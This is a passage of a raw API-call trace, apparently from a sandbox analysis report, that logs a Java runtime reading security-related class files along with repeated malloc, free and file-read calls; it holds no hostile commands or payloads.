liDistanceToMove=0x29aa3fd, lpNewFilePointer=0x208c2c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2c0*=43688957) returned 1 [0118.788] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x1282, lpNumberOfBytesRead=0x208c290, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c290*=0x1282, lpOverlapped=0x0) returned 1 [0118.789] free (_Block=0x12ef4c10) [0118.789] free (_Block=0x12e602d0) [0118.795] strlen (_Str="java/security/cert/CertificateException.class") returned 0x2d [0118.795] malloc (_Size=0x48) returned 0x12e60aa0 [0118.795] malloc (_Size=0xa0) returned 0x12daace0 [0118.795] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x333344f, lpNewFilePointer=0x208bdf0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bdf0*=53687375) returned 1 [0118.795] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bdc0, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208bdc0*=0xa0, lpOverlapped=0x0) returned 1 [0118.795] malloc (_Size=0x2e) returned 0x12ef5610 [0118.796] strlen (_Str="java/security/cert/CertificateException.class") returned 0x2d [0118.796] strcpy (in: _Dest=0x208bf70, _Source="java/security/cert/CertificateException.class" | out: _Dest="java/security/cert/CertificateException.class") returned="java/security/cert/CertificateException.class" [0118.796] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x179c7b3, lpNewFilePointer=0x208b9f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b9f0*=24758195) returned 1 [0118.796] ReadFile (in: hFile=0x134, lpBuffer=0x208ba40, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b9c0, lpOverlapped=0x0 | out: lpBuffer=0x208ba40*, lpNumberOfBytesRead=0x208b9c0*=0x1e, lpOverlapped=0x0) returned 1 [0118.796] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x179c7fe, lpNewFilePointer=0x208ba50, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ba50*=24758270) returned 1 [0118.796] ReadFile (in: hFile=0x134, lpBuffer=0x20fea10, nNumberOfBytesToRead=0x1cf, lpNumberOfBytesRead=0x208ba20, lpOverlapped=0x0 | out: lpBuffer=0x20fea10*, lpNumberOfBytesRead=0x208ba20*=0x1cf, lpOverlapped=0x0) returned 1 [0118.796] free (_Block=0x12ef5590) [0118.797] free (_Block=0x12e60730) [0118.829] strlen (_Str="sun/security/x509/AuthorityInfoAccessExtension") returned 0x2e [0118.830] strlen (_Str="sun/security/x509/AuthorityInfoAccessExtension.class") returned 0x34 [0118.830] malloc (_Size=0x48) returned 0x12e60a50 [0118.830] malloc (_Size=0xa0) returned 0x12dab470 [0118.830] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e4313, lpNewFilePointer=0x208c660, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c660*=54412051) returned 1 [0118.830] ReadFile (in: hFile=0x134, lpBuffer=0x12dab470, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c630, lpOverlapped=0x0 | out: lpBuffer=0x12dab470*, lpNumberOfBytesRead=0x208c630*=0xa0, lpOverlapped=0x0) returned 1 [0118.831] malloc (_Size=0x35) returned 0x12ef5290 [0118.831] strlen (_Str="sun/security/x509/AuthorityInfoAccessExtension.class") returned 0x34 [0118.831] strcpy (in: _Dest=0x208c7e0, _Source="sun/security/x509/AuthorityInfoAccessExtension.class" | out: _Dest="sun/security/x509/AuthorityInfoAccessExtension.class") returned="sun/security/x509/AuthorityInfoAccessExtension.class" [0118.831] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x297b66f, lpNewFilePointer=0x208c260, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c260*=43497071) returned 1 [0118.831] ReadFile (in: hFile=0x134, lpBuffer=0x208c2b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c230, lpOverlapped=0x0 | out: lpBuffer=0x208c2b0*, lpNumberOfBytesRead=0x208c230*=0x1e, lpOverlapped=0x0) returned 1 [0118.832] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x297b6c1, lpNewFilePointer=0x208c2c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2c0*=43497153) returned 1 [0118.832] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x103f, lpNumberOfBytesRead=0x208c290, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c290*=0x103f, lpOverlapped=0x0) returned 1 [0118.833] free (_Block=0x12ef5610) [0118.833] free (_Block=0x12e60aa0) [0118.840] strlen (_Str="sun/security/x509/AccessDescription.class") returned 0x29 [0118.841] malloc (_Size=0x48) returned 0x12e602d0 [0118.841] malloc (_Size=0xa0) returned 0x12dab940 [0118.841] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e4210, lpNewFilePointer=0x208b930, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b930*=54411792) returned 1 [0118.841] ReadFile (in: hFile=0x134, lpBuffer=0x12dab940, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b900, lpOverlapped=0x0 | out: lpBuffer=0x12dab940*, lpNumberOfBytesRead=0x208b900*=0xa0, lpOverlapped=0x0) returned 1 [0118.841] malloc (_Size=0x2a) returned 0x12ef50d0 [0118.841] strlen (_Str="sun/security/x509/AccessDescription.class") returned 0x29 [0118.841] strcpy (in: _Dest=0x208bab0, _Source="sun/security/x509/AccessDescription.class" | out: _Dest="sun/security/x509/AccessDescription.class") returned="sun/security/x509/AccessDescription.class" [0118.841] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2979f87, lpNewFilePointer=0x208b530, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b530*=43491207) returned 1 [0118.841] ReadFile (in: hFile=0x134, lpBuffer=0x208b580, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b500, lpOverlapped=0x0 | out: lpBuffer=0x208b580*, lpNumberOfBytesRead=0x208b500*=0x1e, lpOverlapped=0x0) returned 1 [0118.842] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2979fce, lpNewFilePointer=0x208b590, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b590*=43491278) returned 1 [0118.842] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x9de, lpNumberOfBytesRead=0x208b560, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208b560*=0x9de, lpOverlapped=0x0) returned 1 [0118.843] free (_Block=0x12ef5290) [0118.843] free (_Block=0x12e60a50) [0119.119] CloseHandle (hObject=0x2d4) returned 1 [0119.121] malloc (_Size=0x48) returned 0x12e60b90 [0119.121] malloc (_Size=0x15) returned 0x12d45490 [0119.122] free (_Block=0x12db1e70) [0119.122] free (_Block=0x12ef2cf0) [0119.122] malloc (_Size=0x48) returned 0x12e60a00 [0119.122] malloc (_Size=0x16) returned 0x12d454b0 [0119.123] free (_Block=0x12d45490) [0119.123] free (_Block=0x12e60b90) [0119.123] malloc (_Size=0x48) returned 0x12e60910 [0119.123] malloc (_Size=0xa) returned 0x12d45250 [0119.124] free (_Block=0x12d454b0) [0119.124] free (_Block=0x12e60a00) [0119.124] malloc (_Size=0x48) returned 0x12e60b90 [0119.124] malloc (_Size=0x28) returned 0x12dd9a80 [0119.124] free (_Block=0x12d45250) [0119.124] free (_Block=0x12e616d0) [0119.125] free (_Block=0x12e60910) [0119.127] malloc (_Size=0x48) returned 0x12e60640 [0119.127] malloc (_Size=0x37) returned 0x12ef5390 [0119.128] free (_Block=0x12dd9a80) [0119.128] free (_Block=0x12e60b90) [0119.129] malloc (_Size=0x48) returned 0x12e60690 [0119.129] malloc (_Size=0x48) returned 0x12e60a00 [0119.129] free (_Block=0x12ef5390) [0119.129] free (_Block=0x12e60640) [0119.130] malloc (_Size=0x48) returned 0x12e60a50 [0119.130] malloc (_Size=0x25) returned 0x12dd9ae0 [0119.130] free (_Block=0x12e60a00) [0119.130] free (_Block=0x12e60690) [0119.131] malloc (_Size=0x48) returned 0x12e60320 [0119.131] malloc (_Size=0x30) returned 0x12ef4dd0 [0119.131] free (_Block=0x12dd9ae0) [0119.131] free (_Block=0x12e60a50) [0119.132] malloc (_Size=0x48) returned 0x12e60550 [0119.132] malloc (_Size=0x2d) returned 0x12ef5290 [0119.423] free (_Block=0x12ef4dd0) [0119.423] free (_Block=0x12e60320) [0119.424] malloc (_Size=0x48) returned 0x12e603c0 [0119.424] malloc (_Size=0x30) returned 0x12ef4ad0 [0119.428] free (_Block=0x12ef5290) [0119.428] free (_Block=0x12e60550) [0119.429] malloc (_Size=0x48) returned 0x12e60190 [0119.429] malloc (_Size=0x3d) returned 0x12e60320 [0119.430] free (_Block=0x12ef4ad0) [0119.430] free (_Block=0x12e603c0) [0119.430] malloc (_Size=0x48) returned 0x12e60370 [0119.430] malloc (_Size=0x3d) returned 0x12e60550 [0119.431] free (_Block=0x12e60320) [0119.432] free (_Block=0x12e60190) [0119.432] malloc (_Size=0x48) returned 0x12e60730 [0119.432] malloc (_Size=0x2a) returned 0x12ef4d10 [0119.432] free (_Block=0x12e60550) [0119.433] free (_Block=0x12e60370) [0119.433] malloc (_Size=0x48) returned 0x12e60690 [0119.433] malloc (_Size=0x2d) returned 0x12ef5590 [0119.434] free (_Block=0x12ef4d10) [0119.434] free (_Block=0x12e60730) [0119.434] malloc (_Size=0x48) returned 0x12e60af0 [0119.435] malloc (_Size=0x34) returned 0x12ef4c50 [0119.435] free (_Block=0x12ef5590) [0119.435] free (_Block=0x12e60690) [0119.451] malloc (_Size=0x48) returned 0x12e60550 [0119.451] malloc (_Size=0x3d) returned 0x12e60cd0 [0119.452] free (_Block=0x12ef4c50) [0119.453] free (_Block=0x12e60af0) [0119.453] malloc (_Size=0x48) returned 0x12e60aa0 [0119.453] malloc (_Size=0x33) returned 0x12ef5310 [0119.454] free (_Block=0x12e60cd0) [0119.454] free (_Block=0x12e60550) [0119.454] malloc (_Size=0x48) returned 0x12e60320 [0119.454] malloc (_Size=0x2b) returned 0x12ef5410 [0119.455] free (_Block=0x12ef5310) [0119.455] free (_Block=0x12e60aa0) [0119.455] malloc (_Size=0x48) returned 0x12e60cd0 [0119.455] malloc (_Size=0x34) returned 0x12ef4e50 [0119.456] free (_Block=0x12ef5410) [0119.456] free (_Block=0x12e60320) [0119.456] malloc (_Size=0x48) returned 0x12e60320 [0119.456] malloc (_Size=0x2f) returned 0x12ef4fd0 [0119.457] free (_Block=0x12ef4e50) [0119.457] free (_Block=0x12e60cd0) [0119.458] malloc (_Size=0x48) returned 0x12e60370 [0119.458] malloc (_Size=0x36) returned 0x12ef5050 [0119.459] free (_Block=0x12ef4fd0) [0119.459] free (_Block=0x12e60320) [0119.460] malloc (_Size=0x48) returned 0x12e60870 [0119.460] malloc (_Size=0x2d) returned 0x12ef5110 [0119.460] free (_Block=0x12ef5050) [0119.461] free (_Block=0x12e60370) [0119.461] malloc (_Size=0x48) returned 0x12e60730 [0119.461] malloc (_Size=0x43) returned 0x12e60370 [0119.462] free (_Block=0x12ef5110) [0119.462] free (_Block=0x12e60870) [0119.462] malloc (_Size=0x48) returned 0x12e60870 [0119.463] malloc (_Size=0x2c) returned 0x12ef5350 [0119.463] free (_Block=0x12e60370) [0119.463] free (_Block=0x12e60730) [0119.464] malloc (_Size=0x48) returned 0x12e60640 [0119.464] malloc (_Size=0x2e) returned 0x12ef5190 [0119.465] free (_Block=0x12ef5350) [0119.465] free (_Block=0x12e60870) [0119.465] malloc (_Size=0x48) returned 0x12e60320 [0119.465] malloc (_Size=0x33) returned 0x12ef4750 [0119.466] free (_Block=0x12ef5190) [0119.466] free (_Block=0x12e60640) [0119.467] malloc (_Size=0x48) returned 0x12e608c0 [0119.467] malloc (_Size=0x32) returned 0x12ef4b10 [0119.468] free (_Block=0x12ef4750) [0119.469] free (_Block=0x12e60320) [0119.470] malloc (_Size=0x48) returned 0x12e60aa0 [0119.470] malloc (_Size=0x36) returned 0x12ef4dd0 [0119.471] free (_Block=0x12ef4b10) [0119.471] free (_Block=0x12e608c0) [0119.472] malloc (_Size=0x48) returned 0x12e60320 [0119.472] malloc (_Size=0x2c) returned 0x12ef5310 [0119.473] free (_Block=0x12ef4dd0) [0119.473] free (_Block=0x12e60aa0) [0119.473] malloc (_Size=0x48) returned 0x12e60370 [0119.473] malloc (_Size=0x2f) returned 0x12ef4fd0 [0119.474] free (_Block=0x12ef5310) [0119.474] free (_Block=0x12e60320) [0119.474] malloc (_Size=0x48) returned 0x12e60550 [0119.474] malloc (_Size=0x41) returned 0x12e60320 [0119.475] free (_Block=0x12ef4fd0) [0119.475] free (_Block=0x12e60370) [0119.478] malloc (_Size=0x48) returned 0x12e60370 [0119.478] malloc (_Size=0x2d) returned 0x12ef47d0 [0119.478] free (_Block=0x12e60320) [0119.479] free (_Block=0x12e60550) [0119.482] malloc (_Size=0x48) returned 0x12e60870 [0119.482] malloc (_Size=0x33) returned 0x12ef5310 [0119.483] free (_Block=0x12ef47d0) [0119.484] free (_Block=0x12e60370) [0119.485] malloc (_Size=0x48) returned 0x12e608c0 [0119.485] malloc (_Size=0x2a) returned 0x12ef5610 [0119.486] free (_Block=0x12ef5310) [0119.486] free (_Block=0x12e60870) [0119.486] malloc (_Size=0x48) returned 0x12e60320 [0119.486] malloc (_Size=0x31) returned 0x12ef4c50 [0119.487] free (_Block=0x12ef5610) [0119.487] free (_Block=0x12e608c0) [0119.487] malloc (_Size=0x48) returned 0x12e60370 [0119.488] malloc (_Size=0x2c) returned 0x12ef4fd0 [0119.488] free (_Block=0x12ef4c50) [0119.488] free (_Block=0x12e60320) [0119.489] malloc (_Size=0x48) returned 0x12e60320 [0119.489] malloc (_Size=0x28) returned 0x12dd9c00 [0119.489] free (_Block=0x12ef4fd0) [0119.489] free (_Block=0x12e60370) [0119.490] malloc (_Size=0x48) returned 0x12e60370 [0119.490] malloc (_Size=0x25) returned 0x12dda4a0 [0119.491] free (_Block=0x12dd9c00) [0119.491] free (_Block=0x12e60320) [0119.492] malloc (_Size=0x48) returned 0x12e60460 [0119.492] malloc (_Size=0x43) returned 0x12e60cd0 [0119.493] free (_Block=0x12dda4a0) [0119.493] free (_Block=0x12e60370) [0119.493] malloc (_Size=0x48) returned 0x12e60640 [0119.493] malloc (_Size=0x32) returned 0x12ef5410 [0119.494] free (_Block=0x12e60cd0) [0119.494] free (_Block=0x12e60460) [0119.495] malloc (_Size=0x48) returned 0x12e60cd0 [0119.495] malloc (_Size=0x27) returned 0x12dda080 [0119.497] free (_Block=0x12ef5410) [0119.497] free (_Block=0x12e60640) [0119.498] malloc (_Size=0x48) returned 0x12e60870 [0119.498] malloc (_Size=0x33) returned 0x12ef46d0 [0119.498] free (_Block=0x12dda080) [0119.519] free (_Block=0x12e60cd0) [0119.520] malloc (_Size=0x48) returned 0x12e60730 [0119.520] malloc (_Size=0x3a) returned 0x12e608c0 [0119.521] free (_Block=0x12ef46d0) [0119.521] free (_Block=0x12e60870) [0119.523] malloc (_Size=0x48) returned 0x12e60550 [0119.523] malloc (_Size=0x2d) returned 0x12ef4c50 [0119.524] free (_Block=0x12e608c0) [0119.524] free (_Block=0x12e60730) [0119.525] malloc (_Size=0x48) returned 0x12e60cd0 [0119.525] malloc (_Size=0x3d) returned 0x12e60a00 [0119.525] free (_Block=0x12ef4c50) [0119.525] free (_Block=0x12e60550) [0119.526] malloc (_Size=0x48) returned 0x12e60320 [0119.526] malloc (_Size=0x48) returned 0x12e60190 [0119.526] free (_Block=0x12e60a00) [0119.526] free (_Block=0x12e60cd0) [0119.629] malloc (_Size=0x48) returned 0x12e60cd0 [0119.629] malloc (_Size=0x28) returned 0x12dd9f30 [0119.634] malloc (_Size=0x48) returned 0x12e60730 [0119.634] malloc (_Size=0x3b) returned 0x12e60af0 [0119.635] malloc (_Size=0x48) returned 0x12e60640 [0119.635] malloc (_Size=0x34) returned 0x12ef5110 [0119.636] malloc (_Size=0x48) returned 0x12e60550 [0119.636] malloc (_Size=0x3a) returned 0x12e60320 [0119.637] malloc (_Size=0x48) returned 0x12e60640 [0119.637] malloc (_Size=0x3d) returned 0x12e60190 [0119.637] malloc (_Size=0x48) returned 0x12e60870 [0119.637] malloc (_Size=0x3d) returned 0x12e60730 [0119.638] malloc (_Size=0x48) returned 0x12e608c0 [0119.638] malloc (_Size=0x3b) returned 0x12e60910 [0119.694] malloc (_Size=0x48) returned 0x12e60320 [0119.694] malloc (_Size=0x33) returned 0x12ef4d10 [0119.695] malloc (_Size=0x48) returned 0x12e60190 [0119.695] malloc (_Size=0x36) returned 0x12ef5310 [0119.696] malloc (_Size=0x48) returned 0x12e60cd0 [0119.696] malloc (_Size=0x32) returned 0x12ef5590 [0119.696] malloc (_Size=0x48) returned 0x12e60460 [0119.696] malloc (_Size=0x41) returned 0x12e60b90 [0119.696] malloc (_Size=0x48) returned 0x12e60cd0 [0119.697] malloc (_Size=0x36) returned 0x12ef5410 [0119.697] malloc (_Size=0x48) returned 0x12e60550 [0119.697] malloc (_Size=0x3d) returned 0x12e60190 [0119.698] free (_Block=0x12ef5410) [0119.698] free (_Block=0x12e60cd0) [0119.698] malloc (_Size=0x48) returned 0x12e60320 [0119.698] malloc (_Size=0x29) returned 0x12ef5290 [0119.699] free (_Block=0x12e60190) [0119.699] free (_Block=0x12e60550) [0119.699] malloc (_Size=0x48) returned 0x12e60cd0 [0119.699] malloc (_Size=0x3d) returned 0x12e60640 [0119.700] free (_Block=0x12ef5290) [0119.700] free (_Block=0x12e60320) [0119.700] malloc (_Size=0x48) returned 0x12e60190 [0119.700] malloc (_Size=0x43) returned 0x12e60870 [0119.700] free (_Block=0x12e60640) [0119.701] free (_Block=0x12e60cd0) [0119.701] malloc (_Size=0x48) returned 0x12e60550 [0119.701] malloc (_Size=0x41) returned 0x12e60370 [0119.701] free (_Block=0x12e60870) [0119.705] free (_Block=0x12e60190) [0119.706] malloc (_Size=0x48) returned 0x12e60af0 [0119.706] malloc (_Size=0x33) returned 0x12ef5110 [0119.707] free (_Block=0x12e60370) [0119.707] free (_Block=0x12e60550) [0119.707] malloc (_Size=0x48) returned 0x12e60640 [0119.708] malloc (_Size=0x48) returned 0x12e608c0 [0119.708] free (_Block=0x12ef5110) [0119.708] free (_Block=0x12e60af0) [0119.709] malloc (_Size=0x48) returned 0x12e60320 [0119.709] malloc (_Size=0x28) returned 0x12dda230 [0119.709] free (_Block=0x12e608c0) [0119.709] free (_Block=0x12e60640) [0119.710] malloc (_Size=0x48) returned 0x12e60190 [0119.710] malloc (_Size=0x25) returned 0x12dda140 [0119.710] free (_Block=0x12dda230) [0119.710] free (_Block=0x12e60320) [0119.711] malloc (_Size=0x48) returned 0x12e60910 [0119.711] malloc (_Size=0x34) returned 0x12ef5450 [0119.711] free (_Block=0x12dda140) [0119.712] free (_Block=0x12e60190) [0119.712] malloc (_Size=0x48) returned 0x12e60870 [0119.712] malloc (_Size=0x2a) returned 0x12ef4fd0 [0119.712] free (_Block=0x12ef5450) [0119.714] free (_Block=0x12e60910) [0119.714] malloc (_Size=0x48) returned 0x12e60910 [0119.714] malloc (_Size=0x2e) returned 0x12ef5610 [0119.715] free (_Block=0x12ef4fd0) [0119.716] free (_Block=0x12e60870) [0119.716] malloc (_Size=0x48) returned 0x12e60640 [0119.716] malloc (_Size=0x3d) returned 0x12e60320 [0119.717] free (_Block=0x12ef5610) [0119.718] free (_Block=0x12e60910) [0119.718] malloc (_Size=0x48) returned 0x12e60870 [0119.719] malloc (_Size=0x4a) returned 0x13061880 [0119.720] free (_Block=0x12e60320) [0119.720] free (_Block=0x12e60640) [0119.720] malloc (_Size=0x48) returned 0x12e60190 [0119.721] malloc (_Size=0x34) returned 0x12ef5290 [0119.721] free (_Block=0x13061880) [0119.722] free (_Block=0x12e60870) [0119.722] malloc (_Size=0x48) returned 0x12e60550 [0119.722] malloc (_Size=0x2b) returned 0x12ef4790 [0119.723] free (_Block=0x12ef5290) [0119.723] free (_Block=0x12e60190) [0119.724] malloc (_Size=0x48) returned 0x12e60460 [0119.724] malloc (_Size=0x2c) returned 0x12ef4c50 [0119.725] free (_Block=0x12ef4790) [0119.725] free (_Block=0x12e60550) [0119.725] malloc (_Size=0x48) returned 0x12e60190 [0119.725] malloc (_Size=0x26) returned 0x12dda170 [0119.726] free (_Block=0x12ef4c50) [0119.726] free (_Block=0x12e60460) [0119.726] malloc (_Size=0x48) returned 0x12e60550 [0119.726] malloc (_Size=0x48) returned 0x12e60730 [0119.727] free (_Block=0x12dda170) [0119.727] free (_Block=0x12e60190) [0119.727] malloc (_Size=0x48) returned 0x12e60370 [0119.727] malloc (_Size=0x41) returned 0x12e60a00 [0119.728] free (_Block=0x12e60730) [0119.728] free (_Block=0x12e60550) [0119.728] malloc (_Size=0x48) returned 0x12e60190 [0119.728] malloc (_Size=0x32) returned 0x12ef4fd0 [0119.729] free (_Block=0x12e60a00) [0119.729] free (_Block=0x12e60370) [0119.729] malloc (_Size=0x48) returned 0x12e60870 [0119.729] malloc (_Size=0x3d) returned 0x12e60a00 [0119.730] free (_Block=0x12ef4fd0) [0119.730] free (_Block=0x12e60190) [0119.731] malloc (_Size=0x48) returned 0x12e60a50 [0119.731] malloc (_Size=0x34) returned 0x12ef5410 [0119.731] free (_Block=0x12e60a00) [0119.731] free (_Block=0x12e60870) [0119.732] malloc (_Size=0x48) returned 0x12e60910 [0119.732] malloc (_Size=0x2f) returned 0x12ef4750 [0119.732] free (_Block=0x12ef5410) [0119.733] free (_Block=0x12e60a50) [0119.733] malloc (_Size=0x48) returned 0x12e60460 [0119.733] malloc (_Size=0x34) returned 0x12ef4a90 [0119.735] free (_Block=0x12ef4750) [0119.735] free (_Block=0x12e60910) [0119.735] malloc (_Size=0x48) returned 0x12e60730 [0119.735] malloc (_Size=0x26) returned 0x12dda500 [0119.736] free (_Block=0x12ef4a90) [0119.736] free (_Block=0x12e60460) [0119.736] malloc (_Size=0x48) returned 0x12e60190 [0119.736] malloc (_Size=0x2000) returned 0x12e21f70 [0119.736] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x41276, lpNewFilePointer=0x208f030, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208f030*=266870) returned 1 [0119.736] ReadFile (in: hFile=0x2d0, lpBuffer=0x12e21f70, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208f000, lpOverlapped=0x0 | out: lpBuffer=0x12e21f70*, lpNumberOfBytesRead=0x208f000*=0x2000, lpOverlapped=0x0) returned 1 [0119.737] free (_Block=0x12e15f10) [0119.737] malloc (_Size=0x48) returned 0x12e60460 [0119.737] free (_Block=0x12dda500) [0119.738] free (_Block=0x12e60730) [0119.738] malloc (_Size=0x48) returned 0x12e60a00 [0119.738] malloc (_Size=0x32) returned 0x12ef5590 [0119.738] free (_Block=0x12e60460) [0119.739] free (_Block=0x12e60190) [0119.739] malloc (_Size=0x48) returned 0x12e60550 [0119.739] malloc (_Size=0x2c) returned 0x12ef4fd0 [0119.739] free (_Block=0x12ef5590) [0119.740] free (_Block=0x12e60a00) [0119.740] malloc (_Size=0x48) returned 0x12e60870 [0119.740] malloc (_Size=0x3d) returned 0x12e60190 [0119.740] free (_Block=0x12ef4fd0) [0119.741] free (_Block=0x12e60550) [0119.741] malloc (_Size=0x48) returned 0x12e60320 [0119.741] malloc (_Size=0x31) returned 0x12ef4c50 [0119.742] free (_Block=0x12e60190) [0119.742] free (_Block=0x12e60870) [0119.742] malloc (_Size=0x48) returned 0x12e60190 [0119.742] malloc (_Size=0x47) returned 0x12e60370 [0119.743] free (_Block=0x12ef4c50) [0119.743] free (_Block=0x12e60320) [0119.743] malloc (_Size=0x48) returned 0x12e60320 [0119.743] malloc (_Size=0x29) returned 0x12ef5290 [0119.743] free (_Block=0x12e60370) [0119.744] free (_Block=0x12e60190) [0119.744] malloc (_Size=0x48) returned 0x12e60870 [0119.744] malloc (_Size=0x32) returned 0x12ef4910 [0119.744] free (_Block=0x12ef5290) [0119.744] free (_Block=0x12e60320) [0119.745] malloc (_Size=0x48) returned 0x12e60730 [0119.745] malloc (_Size=0x48) returned 0x12e608c0 [0119.745] free (_Block=0x12ef4910) [0119.745] free (_Block=0x12e60870) [0119.746] malloc (_Size=0x48) returned 0x12e60b90 [0119.746] malloc (_Size=0x2e) returned 0x12ef4e50 [0119.746] free (_Block=0x12e608c0) [0119.746] free (_Block=0x12e60730) [0119.746] malloc (_Size=0x48) returned 0x12e60640 [0119.746] malloc (_Size=0x3d) returned 0x12e60870 [0119.747] free (_Block=0x12ef4e50) [0119.747] free (_Block=0x12e60b90) [0119.747] malloc (_Size=0x48) returned 0x12e60b90 [0119.747] malloc (_Size=0x3d) returned 0x12e60a50 [0119.748] free (_Block=0x12e60870) [0119.748] free (_Block=0x12e60640) [0119.750] malloc (_Size=0x48) returned 0x12e60aa0 [0119.750] malloc (_Size=0x3f) returned 0x12e60190 [0119.751] free (_Block=0x12e60a50) [0119.751] free (_Block=0x12e60b90) [0119.752] malloc (_Size=0x48) returned 0x12e60320 [0119.752] malloc (_Size=0x34) returned 0x12ef5290 [0119.752] free (_Block=0x12e60190) [0119.753] free (_Block=0x12e60aa0) [0119.753] malloc (_Size=0x48) returned 0x12e60190 [0119.753] malloc (_Size=0x27) returned 0x12dda3e0 [0119.753] free (_Block=0x12ef5290) [0119.754] free (_Block=0x12e60320) [0119.754] malloc (_Size=0x48) returned 0x12e60870 [0119.754] malloc (_Size=0x2d) returned 0x12ef5290 [0119.754] free (_Block=0x12dda3e0) [0119.755] free (_Block=0x12e60190) [0119.755] malloc (_Size=0x48) returned 0x12e60460 [0119.755] malloc (_Size=0x3d) returned 0x12e60a00 [0119.755] free (_Block=0x12ef5290) [0119.755] free (_Block=0x12e60870) [0119.756] malloc (_Size=0x48) returned 0x12e60b90 [0119.756] malloc (_Size=0x43) returned 0x12e60550 [0119.756] free (_Block=0x12e60a00) [0119.756] free (_Block=0x12e60460) [0119.757] malloc (_Size=0x48) returned 0x12e60870 [0119.757] malloc (_Size=0x3d) returned 0x12e60190 [0119.757] free (_Block=0x12e60550) [0119.757] free (_Block=0x12e60b90) [0119.757] malloc (_Size=0x48) returned 0x12e60320 [0119.757] malloc (_Size=0x41) returned 0x12e60460 [0119.758] free (_Block=0x12e60190) [0119.758] free (_Block=0x12e60870) [0119.758] malloc (_Size=0x48) returned 0x12e60640 [0119.758] malloc (_Size=0x34) returned 0x12ef5110 [0119.759] free (_Block=0x12e60460) [0119.759] free (_Block=0x12e60320) [0119.759] malloc (_Size=0x48) returned 0x12e60320 [0119.759] malloc (_Size=0x32) returned 0x12ef5590 [0119.760] free (_Block=0x12ef5110) [0119.760] free (_Block=0x12e60640) [0119.760] malloc (_Size=0x48) returned 0x12e60190 [0119.760] malloc (_Size=0x2c) returned 0x12ef4c50 [0119.761] free (_Block=0x12ef5590) [0119.761] free (_Block=0x12e60320) [0119.761] malloc (_Size=0x48) returned 0x12e60730 [0119.761] malloc (_Size=0x35) returned 0x12ef5310 [0119.762] free (_Block=0x12ef4c50) [0119.762] free (_Block=0x12e60190) [0119.762] malloc (_Size=0x48) returned 0x12e60190 [0119.762] malloc (_Size=0x2c) returned 0x12ef4d10 [0119.763] free (_Block=0x12ef5310) [0119.763] free (_Block=0x12e60730) [0119.763] malloc (_Size=0x48) returned 0x12e60320 [0119.763] malloc (_Size=0x43) returned 0x12e60af0 [0119.764] free (_Block=0x12ef4d10) [0119.764] free (_Block=0x12e60190) [0119.764] malloc (_Size=0x48) returned 0x12e60870 [0119.764] malloc (_Size=0x34) returned 0x12ef4fd0 [0119.765] free (_Block=0x12e60af0) [0119.765] free (_Block=0x12e60320) [0119.765] malloc (_Size=0x48) returned 0x12e60910 [0119.765] malloc (_Size=0x28) returned 0x12dda230 [0119.766] free (_Block=0x12ef4fd0) [0119.766] free (_Block=0x12e60870) [0119.766] malloc (_Size=0x48) returned 0x12e60320 [0119.766] malloc (_Size=0x32) returned 0x12ef46d0 [0119.767] free (_Block=0x12dda230) [0119.767] free (_Block=0x12e60910) [0119.767] malloc (_Size=0x48) returned 0x12e60370 [0119.767] malloc (_Size=0x43) returned 0x12e60a00 [0119.768] free (_Block=0x12ef46d0) [0119.768] free (_Block=0x12e60320) [0119.768] malloc (_Size=0x48) returned 0x12e60190 [0119.768] malloc (_Size=0x3b) returned 0x12e60af0 [0119.769] free (_Block=0x12e60a00) [0119.769] free (_Block=0x12e60370) [0119.769] malloc (_Size=0x48) returned 0x12e60640 [0119.769] malloc (_Size=0x32) returned 0x12ef4910 [0119.770] free (_Block=0x12e60af0) [0119.770] free (_Block=0x12e60190) [0119.770] malloc (_Size=0x48) returned 0x12e60690 [0119.770] malloc (_Size=0x27) returned 0x12dd9de0 [0119.771] free (_Block=0x12ef4910) [0119.771] free (_Block=0x12e60640) [0119.771] malloc (_Size=0x48) returned 0x12e60b90 [0119.771] malloc (_Size=0x34) returned 0x12ef5290 [0119.772] free (_Block=0x12dd9de0) [0119.772] free (_Block=0x12e60690) [0119.773] malloc (_Size=0x48) returned 0x12e60a00 [0119.773] malloc (_Size=0x41) returned 0x12e60870 [0119.773] free (_Block=0x12ef5290) [0119.774] free (_Block=0x12e60b90) [0119.774] malloc (_Size=0x48) returned 0x12e60910 [0119.774] malloc (_Size=0x2b) returned 0x12ef4e10 [0119.775] free (_Block=0x12e60870) [0119.775] free 